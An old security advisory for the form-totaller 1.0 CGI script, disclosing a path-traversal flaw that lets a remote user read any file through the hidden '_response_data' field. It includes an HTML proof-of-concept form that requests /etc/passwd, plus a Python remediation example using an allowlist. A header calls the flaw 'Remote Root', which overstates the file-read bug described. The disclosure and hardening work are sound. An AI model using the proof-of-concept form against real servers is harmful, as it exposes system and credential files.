Form-Totaller version 1.0 (form-totaller.cgi) trusts user input for filenames, allowing a remote user to read any file on the webserver.
Content-Type: Remote Root via vulnerable CGI software
Date : 13/08/2000
Sender : s1gnal_9 <s1gnal-9@vs-solutions.com>
Subject : form-totaller Vulnerable CGI
X-System : UNIX/NT systems running the form-totaller CGI software
X-Status : s1gnal_9-ADVISORY-form-totaller.txt
X-Greets : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________
PRODUCT NAME: form-totaller version 1.0
PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/
Also Available at freecode.com
DESCRIPTION :
Use "form-totaller" to create tests and quizzes on the web.
Use forms with pull-down menus or radio buttons and this CGI will display
output based on the user's input.
PROBLEM:
The command field "_response_data" is the hidden field that specifies the file
whose contents are displayed based on the user's input.
The default file for this field is set at:
<input type="hidden" name="_response_data" value="responses.dat">
A remote attacker could easily change the value submitted to the CGI script so that
"/etc/passwd" is used as the response data file.
EXAMPLE:
Below is an example of how we could read files on the remote system.
<-------------------------CUT HERE-------------------------------------->
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">
<input type="hidden" name="_response_top" value="top.html">
<input type="hidden" name="_response_data" value="/etc/passwd">
<input type="hidden" name="_response_bottom" value="bottom.html">
<input type="hidden" name="_divide_by" value="4">
<input type="submit" value="Click for viewing of the /etc/passwd file.">
</form>
<-------------------------CUT HERE-------------------------------------->
SOLUTION:
I would recommend hard-coding the response_data file right into the script
and leaving that command field out of the cgi.
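The recommendation above, worked through as an added Python example (form-totaller itself is not written in Python and this is not its code): the vulnerable pattern of opening whatever filename the form supplies is shown beside a version that accepts only a hard-coded allowlist of bare filenames and confirms the resolved path stays inside the data directory. DATA_DIR and the allowlist contents are assumptions.

```python
import os
from pathlib import Path

# Assumed directory that legitimately holds the response-data files.
DATA_DIR = Path("/var/www/form-totaller/data")

# Hard-coded allowlist of response files installed by the quiz author (assumed).
ALLOWED_RESPONSE_FILES = {"responses.dat"}


class ResponseFileError(ValueError):
    """Raised when the requested response file is not permitted."""


def unsafe_response_path(requested: str) -> Path:
    """Vulnerable pattern: the submitted "_response_data" value is used as the
    filename unchanged, so "/etc/passwd" or "../../etc/passwd" would be opened."""
    return Path(requested)


def safe_response_path(requested: str) -> Path:
    """Hardened pattern: accept only an allowlisted bare filename, then resolve it
    under DATA_DIR and verify the result has not escaped that directory."""
    # Reject anything that carries directory components or is not a real name.
    if os.path.basename(requested) != requested or requested in ("", ".", ".."):
        raise ResponseFileError(f"rejected response file name: {requested!r}")
    if requested not in ALLOWED_RESPONSE_FILES:
        raise ResponseFileError(f"response file not in allowlist: {requested!r}")
    candidate = (DATA_DIR / requested).resolve()
    # Defence in depth: after symlink resolution the file must still sit in DATA_DIR.
    if DATA_DIR.resolve() not in candidate.parents:
        raise ResponseFileError(f"response file escapes data dir: {requested!r}")
    return candidate


def response_file_from_form(fields: dict) -> Path:
    """Pick the response file for one submitted form, falling back to the default."""
    return safe_response_path(fields.get("_response_data", "responses.dat"))


def is_rejected(requested: str) -> bool:
    """True when the hardened check refuses the requested name."""
    try:
        safe_response_path(requested)
    except ResponseFileError:
        return True
    return False
```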
Please visit www.zone.ee/unix :)